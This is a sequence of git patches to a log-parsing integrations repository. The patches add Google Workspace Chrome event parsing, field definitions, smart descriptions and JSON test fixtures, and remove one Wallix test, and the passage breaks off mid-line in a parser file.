- "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1504,7 +1504,7 @@ "value": 22 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] From b1252eaca9c4f4450874f6f8943795476e8ed8e3 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:36:26 +0100 Subject: [PATCH 044/150] apply linter --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 0e522bee5..ded77dffa 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + google.report.saml.application_name: description: Saml SP application name name: google.report.saml.application_name From 19a65a4d5e293e1d2fdbfa64529dc10caee206c9 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:40:52 +0100 Subject: [PATCH 045/150] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 4cf8bb8e7..9e00ad24a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -215,6 +215,10 @@ }, { "field": "google.report.rule.type" + } + ] + }, + { "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", "conditions": [ { From 9ff46d902883e220abb1678fe65f6151d46ab06c Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:44:32 +0100 Subject: [PATCH 046/150] Fix fields --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ded77dffa..21d6f4ee1 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + type: keyword google.report.saml.application_name: description: Saml SP application name From c99c1228b8eba92184a6a6ca972ffea8034cd286 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 15 Nov 2024 12:03:00 +0100 Subject: [PATCH 047/150] test(Wallix): remove useless test --- Wallix/wallix-bastion/tests/rexec.json | 12 ------------ 1 file changed, 12 deletions(-) delete mode 100644 Wallix/wallix-bastion/tests/rexec.json diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 --- a/Wallix/wallix-bastion/tests/rexec.json +++ /dev/null @@ -1,12 +0,0 @@ -{ - "input": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation" - }, - "expected": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } -} \ No newline at end of file From 3c5145e8f49c9fd9c07d4f2af1d4cf491bdbbc35 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:25:48 +0100 Subject: [PATCH 048/150] Add chrome service --- .../_meta/smart-descriptions.json | 57 +++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++++++ .../tests/test_chrome_sample_1.json | 47 +++++++++++++++ .../tests/test_chrome_sample_2.json | 45 +++++++++++++++ 4 files changed, 169 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_2.json diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6fa8c709a..0ac5acfe5 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -282,6 +282,63 @@ } ] }, + { + "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.id" + } + ] + }, + { + "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, + { + "value": "The user on device model {device.model.name} log in due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 3a0fce88f..c92e4bf32 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -30,6 +30,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "vault"}}' - name: set_saml_fields filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -278,3 +280,21 @@ stages: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' filter: '{{ json_event.message.events[0].name == "login_failure"}}' + + set_chrome_fields: + actions: + - set: + event.category: ["web"] + organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' + + - set: + event.type: ["connection"] + filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}' diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json new file mode 100644 index 000000000..36c42d3d5 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -0,0 +1,47 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "id": "0x2", + "model": { + "identifier": "S5NXNZ00A000000", + "name": "2.0 root hub" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..49574fa28 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -0,0 +1,45 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "device": { + "model": { + "identifier": "S5NXNZ00A000000" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file From 3221f63e4467bb80d815c9e37e2ce48f95f74b44 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:27:24 +0100 Subject: [PATCH 049/150] Apply linter --- Google Cloud/google-report/ingest/parser.yml | 2 +- Google Cloud/google-report/tests/test_chrome_sample_1.json | 4 ++-- Google Cloud/google-report/tests/test_chrome_sample_2.json | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index c92e4bf32..2dde85fdb 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -290,7 +290,7 @@ stages: device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["change"] filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index 36c42d3d5..e0e145d54 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index 49574fa28..ecbf27de3 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", From f2dd3b05166600bb2e7e6a91ba6fc89cbbc6e400 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:44:12 +0100 Subject: [PATCH 050/150] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 8 +++++++- Google Cloud/google-report/ingest/parser.yml | 2 +- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 82e74ecd7..b58cf816e 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -174,6 +174,13 @@ { "field": "network.application", "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + } + ] + }, + { "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", "conditions": [ { @@ -263,7 +270,6 @@ "field": "event.action" }, { - "field": "google.report.access.application" "field": "google.report.saml.application_name" } ] diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index f3b54b479..f928e2148 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -272,7 +272,7 @@ stages: event.type: ["denied"] device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' - + set_rules_fields: actions: - set: From 1e5f81194e4fe8d0f69df8ea7d743b39d35fd469 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 10:47:49 +0100 Subject: [PATCH 051/150] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index b58cf816e..c1a559ed7 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -177,6 +177,12 @@ }, { "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" } ] }, From 7478edd763b6ef7828fbc8cbf8e481b7aa1c2b1b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:27:09 +0100 Subject: [PATCH 052/150] Fix smart desc --- .../_meta/smart-descriptions.json | 22 ------------------- 1 file changed, 22 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index c1a559ed7..a25527ef8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -293,9 +293,6 @@ }, { "field": "user.email" - }, - { - "field": "google.report.saml.application_name" } ] }, @@ -334,25 +331,6 @@ } ] }, - { - "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", - "conditions": [ - { - "field": "network.application", - "value": "saml" - }, - { - "field": "event.action", - "value": "login_failure" - }, - { - "field": "user.email" - }, - { - "field": "google.report.saml.application_name" - } - ] - }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ From 65af5b12298e7c7884511b6f93260bf41fbc2b8b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:41:54 +0100 Subject: [PATCH 053/150] Add some modification to the parser --- .../google-report/_meta/smart-descriptions.json | 4 ++-- Google Cloud/google-report/ingest/parser.yml | 6 ++++-- .../google-report/tests/test_chrome_sample_1.json | 10 ++++++++-- .../google-report/tests/test_chrome_sample_2.json | 7 ++++--- 4 files changed, 18 insertions(+), 9 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 0ac5acfe5..0c49ccdf8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -283,7 +283,7 @@ ] }, { - "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", "conditions": [ { "field": "network.application", @@ -297,7 +297,7 @@ "field": "device.model.name" }, { - "field": "device.id" + "field": "device.model.identifier" } ] }, diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 2dde85fdb..e15db634e 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -287,9 +287,11 @@ stages: event.category: ["web"] organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' - device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' - device.model.identifier: '{% for param in 